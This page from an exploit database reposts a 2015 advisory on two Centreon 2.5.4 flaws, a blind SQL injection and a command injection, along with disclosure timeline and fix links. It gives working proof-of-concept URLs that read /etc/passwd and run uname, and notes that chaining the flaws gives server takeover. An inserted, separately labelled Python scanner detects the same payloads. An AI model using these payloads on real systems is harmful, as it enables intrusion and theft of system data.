0day.today - Biggest Exploit Database in the World.
Centreon 2.5.4 - Multiple Vulnerabilities
Security Risk: High
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution

CVEs: CVE-2015-1560, CVE-2015-1561
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
Product description: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)

Advisory introduction: Centreon 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.

Credit: Huy-Ngoc DAU of Deloitte Conseil, France

================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================

The vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which the unsanitized "sid" GET parameter is used in a SQL request.

PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27

By exploiting CVE-2015-1560, an attacker can obtain, among other things, a valid session_id, which is required to exploit CVE-2015-1561.

================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================

The $command_line variable, which is passed to the popen function, is constructed from unsanitized GET parameters.
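Defender-side detection for both findings, as an added example that is not part of the advisory or of Centreon's own code: it scans combined-format access log lines (constructed samples; the log layout is an assumed Apache/nginx default) for the two endpoints named above, flagging a "sid" that is not shaped like a PHP session id (CVE-2015-1560) and shell metacharacters in the getStats.php parameters that reach popen (CVE-2015-1561).

```python
import re
from urllib.parse import parse_qs, urlsplit
# Endpoints named in the advisory, mapped to the parameters the PoCs abuse.
WATCHED = {
    "/centreon/include/common/XmlTree/GetXmlTree.php": {"sid"},
    "/centreon/include/Administration/corePerformance/getStats.php": {"ns_id", "key", "start", "end"},
}
# A PHP session id is alphanumeric (',' and '-' allowed); anything else in "sid" is a
# candidate CVE-2015-1560 injection. Shell metacharacters have no business in the
# getStats.php parameters that end up in the popen command line (CVE-2015-1561).
SESSION_ID_RE = re.compile(r"[A-Za-z0-9,-]*")
SHELL_META_RE = re.compile(r"[|;&`$<>\n]")
# Combined log format request line (assumed Apache/nginx default layout).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def inspect_request(url):
    """Return (cve, parameter, decoded value) findings for one request URL."""
    parts = urlsplit(url)
    watched = WATCHED.get(parts.path)
    if watched is None:
        return []
    findings = []
    # parse_qs percent-decodes and turns '+' into spaces, so we inspect what PHP saw.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            if name == "sid" and not SESSION_ID_RE.fullmatch(value):
                findings.append(("CVE-2015-1560", name, value))
            elif name != "sid" and SHELL_META_RE.search(value):
                findings.append(("CVE-2015-1561", name, value))
    return findings

def scan_log(lines):
    """Return one alert dict per suspicious parameter found in the access-log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        for cve, param, value in inspect_request(m["url"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "cve": cve, "param": param, "value": value})
    return alerts
# Constructed sample log lines: two mirror the advisory's PoC requests, two are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Nov/2024:10:00:01 +0000] "GET /centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27 HTTP/1.1" 200 512',
    '203.0.113.5 - - [16/Nov/2024:10:00:09 +0000] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=today&session_id=abc123 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [16/Nov/2024:10:01:00 +0000] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=today&session_id=abc123 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [16/Nov/2024:10:01:05 +0000] "GET /centreon/main.php?p=1 HTTP/1.1" 200 300',
]
```

Run `scan_log(SAMPLE_LOG)` to get the two alerts; the benign getStats.php request with integer ns_id and allowlisted words produces none.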
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting a command into the "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=today&session_id=[valid session_id]
- Injecting "uname -a" into the "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%23&session_id=[valid session_id]

Combining the two vulnerabilities, an unauthenticated attacker can take control of the web server.

================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE

References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582

# 0day.today [2024-11-16] #